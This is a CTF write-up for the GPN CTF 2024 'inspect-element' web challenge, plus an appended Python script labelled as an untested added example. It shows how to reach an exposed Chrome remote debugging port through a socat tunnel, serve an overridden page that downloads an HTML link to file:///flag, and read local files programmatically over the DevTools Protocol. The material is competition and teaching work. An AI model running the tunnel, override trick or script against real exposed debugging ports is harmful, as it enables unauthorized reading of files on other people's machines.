GPN CTF 2024 - inspect-element - web
The Dockerfile runs Chrome with the remote debugging port exposed. To reach that port from my machine I used the command from the hint, which terminates TLS to the challenge host and re-exposes the debugging port as plain TCP on local port 1336:
socat TCP-LISTEN:1336,fork OPENSSL:positions--ariana-grande-8298.ctf.kitctf.de:443
Then I could go to chrome://inspect/#devices and register localhost:1336
as the address of a network target, which connects to the remote debugging port. To get this working I followed the Chrome documentation on accessing local servers and Chrome instances with port forwarding. If successful, you should see something like this:
Then you can click the inspect fallback button and it should open Developer Tools for the remote Chrome instance. Go to chrome://settings/downloads
and disable the option Ask where to save each file before downloading
, so that the download below is written to disk without a native save dialog. The next step is to save the 127.0.0.1:13370
URL for Local Overrides (Sources panel of the DevTools you just opened): DevTools will then serve your local copy of index.html in place of the real response when the remote tab reloads. Make the contents of index.html
on your local machine the following:
<html>
<body>
<!-- Served into the remote tab through DevTools Local Overrides. The button
     builds a tiny HTML file in memory and downloads it; opened from
     chrome://downloads it runs from a file:// origin, which may link to
     file:///flag, whereas a renderer-initiated navigation from
     http://127.0.0.1:13370 to a file:// URL is blocked by Chrome. -->
<button id="download">click</button>
<script>
const downloadText = () => {
  // The downloaded "page" is nothing but a link to the flag file.
  const text = `<a href="file:///flag">pwn</a>`;
  const blob = new Blob([text], { type: "text/plain" });
  const url = URL.createObjectURL(blob);
  const a = document.createElement("a");
  a.href = url;
  a.download = "hello.html"; // the .html extension makes Chrome render it as a page
  a.click();
  URL.revokeObjectURL(url);
};
document.getElementById("download").addEventListener("click", downloadText);
</script>
</body>
</html>
After doing so, reload the page, click the button and go to chrome://downloads
to see the downloaded file. Open it; the debugger should report that the tab is no longer active, like so:
However, the chrome://inspect tab will show that a new tab has opened:
After clicking inspect fallback on that tab we are able to click the pwn link:
and that takes us to the flag file:
P.S.: Navigating directly to the URL file:///flag
was, for some reason, rewritten from file:///
to http://file///flag
, which is why we used this workaround.
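Both the procedure above and the P.S. go through the chrome://inspect UI. The same exposed debugging port can be driven programmatically over the DevTools Protocol. The script below is an added example, not the author's code and not part of the write-up; it assumes the socat tunnel is running so the remote Chrome answers on localhost:1336 (the port from the write-up), that Page.navigate on the remote Chrome accepts a file:// URL (untested against this challenge; the http://file///flag rewrite in the P.S. came from the chrome://inspect URL box), and a Chrome recent enough to want PUT on /json/new. It uses only the standard library, so the WebSocket handshake and framing are done by hand.

```python
"""Drive the exposed debugging port over the DevTools Protocol (added example,
not from the write-up). Assumes the write-up's socat tunnel is running, so the
remote Chrome is reachable at localhost:1336, and that Page.navigate accepts a
file:// URL (the http://file///flag rewrite was a chrome://inspect UI quirk).
Stdlib only: the WebSocket handshake and framing (RFC 6455) are done by hand."""
import base64, json, os, socket, struct, time
from urllib.parse import urlparse
from urllib.request import Request, urlopen

DEBUG_HOST, DEBUG_PORT = "localhost", 1336  # local end of the socat tunnel

def ws_encode_frame(payload: bytes, opcode: int = 1) -> bytes:
    """One FIN frame; client-to-server frames must be masked (RFC 6455 5.3)."""
    header, n = bytes([0x80 | opcode]), len(payload)
    if n < 126:
        header += bytes([0x80 | n])
    elif n < 1 << 16:
        header += bytes([0x80 | 126]) + struct.pack(">H", n)
    else:
        header += bytes([0x80 | 127]) + struct.pack(">Q", n)
    mask = os.urandom(4)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))

def ws_decode_frame(data: bytes):
    """(opcode, payload, bytes_used) for the frame at the front of data, else None."""
    if len(data) < 2:
        return None
    opcode, masked, n, pos = data[0] & 0x0F, bool(data[1] & 0x80), data[1] & 0x7F, 2
    if n == 126 and len(data) >= 4:
        n, pos = struct.unpack(">H", data[2:4])[0], 4
    elif n == 127 and len(data) >= 10:
        n, pos = struct.unpack(">Q", data[2:10])[0], 10
    elif n >= 126:
        return None  # extended length field not fully received yet
    mask, pos = (data[pos:pos + 4], pos + 4) if masked else (b"", pos)
    if len(data) < pos + n:
        return None
    payload = data[pos:pos + n]
    if masked:
        payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return opcode, payload, pos + n

class CdpSession:
    """One WebSocket to a DevTools target; matches replies to command ids."""

    def __init__(self, ws_url: str):
        u = urlparse(ws_url)
        self.sock = socket.create_connection((u.hostname, u.port))
        key = base64.b64encode(os.urandom(16)).decode()
        self.sock.sendall((f"GET {u.path} HTTP/1.1\r\nHost: {u.hostname}:{u.port}\r\n"
                           "Upgrade: websocket\r\nConnection: Upgrade\r\n"
                           f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n").encode())
        resp = b""
        while b"\r\n\r\n" not in resp:
            resp += self.sock.recv(4096)
        head, self.buf = resp.split(b"\r\n\r\n", 1)
        if not head.startswith(b"HTTP/1.1 101"):
            raise RuntimeError("upgrade refused: " + head.decode(errors="replace"))
        self.next_id = 0

    def _recv_message(self) -> dict:
        while (parsed := ws_decode_frame(self.buf)) is None:
            chunk = self.sock.recv(1 << 16)
            if not chunk:
                raise ConnectionError("DevTools closed the socket")
            self.buf += chunk
        opcode, payload, used = parsed
        self.buf = self.buf[used:]
        # Chrome sends each JSON message as one text frame; other frames are skipped.
        return json.loads(payload) if opcode == 1 else self._recv_message()

    def call(self, method: str, **params) -> dict:
        """Send one command and block for its reply, skipping interleaved events."""
        self.next_id += 1
        msg = {"id": self.next_id, "method": method, "params": params}
        self.sock.sendall(ws_encode_frame(json.dumps(msg).encode()))
        while (reply := self._recv_message()).get("id") != self.next_id:
            pass
        if "error" in reply:
            raise RuntimeError(reply["error"])
        return reply.get("result", {})

def read_local_file(url="file:///flag", host=DEBUG_HOST, port=DEBUG_PORT) -> str:
    """Open url in a new tab of the remote Chrome and return its rendered text."""
    with urlopen(Request(f"http://{host}:{port}/json/new?about:blank", method="PUT")) as r:
        page = CdpSession(json.load(r)["webSocketDebuggerUrl"])
    page.call("Page.navigate", url=url)
    loaded = f"location.href == {json.dumps(url)} && document.readyState == 'complete'"
    for _ in range(50):  # poll until the new document has finished loading
        try:
            if page.call("Runtime.evaluate", expression=loaded)["result"]["value"]:
                break
        except RuntimeError:
            pass  # evaluate can fail while the old execution context is torn down
        time.sleep(0.2)
    return page.call("Runtime.evaluate", expression="document.body.innerText")["result"]["value"]

if __name__ == "__main__":
    print(read_local_file())
```

With the tunnel up, running the script prints the rendered contents of file:///flag. If the remote Chrome refuses the file:// navigation at this level too, the download-and-open trick above still applies; the CdpSession class can then be used to drive that flow (Runtime.evaluate to click the button, Target.createTarget on the downloaded file) instead of clicking through chrome://inspect.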